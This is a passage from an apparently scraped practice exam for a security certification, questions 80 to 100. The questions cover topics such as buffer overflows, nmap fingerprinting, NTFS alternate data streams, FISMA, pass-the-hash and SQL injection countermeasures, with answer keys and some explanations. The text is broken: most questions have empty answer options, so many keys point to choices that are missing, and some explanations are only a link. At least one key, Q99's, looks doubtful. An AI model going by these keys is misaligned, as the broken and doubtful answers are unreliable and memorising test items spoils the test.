-
D
-
E
Reveal answer details
Close answer details
Correct answerB
ExplanationOne defense against buffer overflow attacks is to configure the system to not allow code to be executed in the stack. The parameters max_nprocs and maxuprc dictate the number of processes that can run on a system or be created by a user, respectively. Setting either of these values too low could cause a denial of service. default_stksize sets the minimum stack size for each thread. segkpsize limits the amount of pageable kernel memory.
Question 81
Single choice
Which of the following best describes a statically linked binary?
-
A
A binary program that contains debugging and symbol table information
-
B
A self-contained program that needs no external libraries
-
C
Source code that is linked to a specific operating system
-
D
Source code that is compiled and linked into a binary
Reveal answer details
Close answer details
Correct answerB
ExplanationStatically linked binaries do not rely on any of the code libraries on the victim machine. Because attackers might have altered these libraries, we want to use tools that have all libraries built-in.
Question 82
Single choice
Analyze the command output below. Why did OS detection fail? 
-
A
The host returned a malformed response to nmap
-
B
The host fingerprint is not in the nmap signature file
-
C
The return packet is URL-encoded and not readable
-
D
The return packet is not using the correct protocol
Reveal answer details
Close answer details
Correct answerB
ExplanationOS detection fails when a signature is not found in the nmap files. If there is no recognizable fingerprint, nmap returns the string with instructions to send it to insecure.org for inclusion in the fingerprint list. This is critical because there will be times when Nmap does not have a proper fingerprint for a service. In these situations, it provides you with banner information for the service. With this information, an incident handler can then do a Google search of the banner information Nmap provides and, in some situations, discover a new backdoor on your environment.
Question 83
Multiple choice
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 84
Single choice
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str). What attack will his program expose the Web application to?
-
A
-
B
Cross Site Scripting attack
-
C
-
D
Reveal answer details
Close answer details
Question 85
Single choice
You are copying files from the C:\WINDOWS\system32 directory to a USB memory stick and encounter the pop-up shown in the image. What does this indicate? 
-
A
The system has not been scanned for rootkits
-
B
The java.exe executable cannot be run from the memory USB stick
-
C
The filesystem on the USB memory stick is not NTFS
-
D
There is a virus embedded inside the java executable
-
E
Java is being used on the system and there is a resource conflict
Reveal answer details
Close answer details
Correct answerC
ExplanationWhen a file containing an alternate data stream on an NTFS filesystem is copied to a non NTFS filesystem, the stream data is lost. In this case, Windows has discovered that the steam attached to java.exe is about to be lost and is asking if you want to continue.
Question 86
Single choice
Which of the following US Acts emphasized a "risk-based policy for cost-effective security" and makes mandatory for agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency's information security program and report the results to Office of Management and Budget?
-
A
The Electronic Communications Privacy Act of 1986 (ECPA)
-
B
The Fair Credit Reporting Act (FCRA)
-
C
The Equal Credit Opportunity Act (ECOA)
-
D
Federal Information Security Management Act of 2002 (FISMA)
Reveal answer details
Close answer details
Question 87
Single choice
In which of the following attacks does an attacker spoof the source address in IP packets that are sent to the victim?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 88
Multiple choice
You work as a System Administrator in SunSoft Inc. You are running a virtual machine on Windows Server 2003. The virtual machine is protected by DPM. Now, you want to move the virtual machine to another host. Which of the following steps can you use to accomplish the task? Each correct answer represents a part of the solution. (Choose all that apply.)
-
A
Remove the original virtual machine from the old server and stop the protection for the original virtual machine.
-
B
-
C
Add the copied virtual machine to a protection group.
-
D
Copy the virtual machine to the new server.
Reveal answer details
Close answer details
Question 89
Single choice
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 90
Single choice
What request methods are exploited in a Lanturtle + Responder access attack?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerC
ExplanationReferences: https://www.linkedin.com/pulse/configuring-responder-stealing-credentials-from-locked-ben-downton/
Question 91
Single choice
Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 92
Single choice
Which tool is used to provide 128-bit encryption of passwords?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerD
ExplanationSAM Lock Tool, better known as syskey (the name of its executable file) is a discontinued component of Microsoft Windows that encrypts the Security Account Manager (SAM) database using a 128-bit RC4 encryption key.
Question 93
Single choice
What is the name of the GUI-based front end for Nmap?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerB
ExplanationThe GUI-based front end for Nmap is called Zenmap. Nessus is a separate network vulnerability scanning utility. WinMap and Nmap-GUI are not in existence.
Question 94
Multiple choice
Which of the following can be used as a countermeasure against the SQL injection attack? Each correct answer represents a complete solution. (Choose two.)
-
A
mysql_real_escape_string()
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 95
Multiple choice
Which of the following programming languages are NOT vulnerable to buffer overflow attacks? Each correct answer represents a complete solution. (Choose two.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 96
Single choice
An attacker configured nmap with command line options that specified the destination port, destination IP address, and TCP flags to be set to SYN/FIN/PSH/URG. No other command line options were specified. He then sent the packet to an open port on a host at the destination address. Which of the following could he be trying to accomplish?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerC
ExplanationThe RFC's do not define how systems are supposed to respond to illegal combinations of TCP flags, such as SYN/FIN/PSH/URG. Therefore, various operating systems will respond differently, and this technique could be used to identify the OS. Version/service scanning tries to determine the program number of the listening service, and does not use this illegal combination of TCP flags. The attacker is not trying to exploit the service because he did not use the nmap scripting engine (NSE). A TCP Window Scan is similar to an ACK scan (in that the ACK flag is the only one set), but it looks at the size of the Window in the return packet.
Question 97
Single choice
Becky is reviewing the password policy for the Firm's Windows network. She would like to make the password minimum length 15 characters. What will be the effect of this change?
-
A
It will require converting password to all upper case
-
B
It will require padding password with null bytes
-
C
It will eliminate the NTLM hash for that account
-
D
It will eliminate the LANMAN hash for that account
Reveal answer details
Close answer details
Question 98
Single choice
Which reconnaissance source would you expect to provide the information in the below screen capture? 
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 99
Single choice
An organization has enabled local account token filtering in the registry for workstations. What additional step do they need to take in order to defend against pass-the-hash attacks?
-
A
Remove active command prompts
-
B
Disable the local administrator account
-
C
Disable null sessions on the domain
-
D
Block outbound access to TCP port 139
Reveal answer details
Close answer details
Correct answerD
ExplanationReferences: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf
Question 100
Single choice
You work as a Network Administrator for Marioxnet Inc. You have the responsibility of handling two routers with BGP protocol for the enterprise's network. One of the two routers gets flooded with an unexpected number of data packets, while the other router starves with no packets reaching it. Which of the following attacks can be a potential cause of this?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
|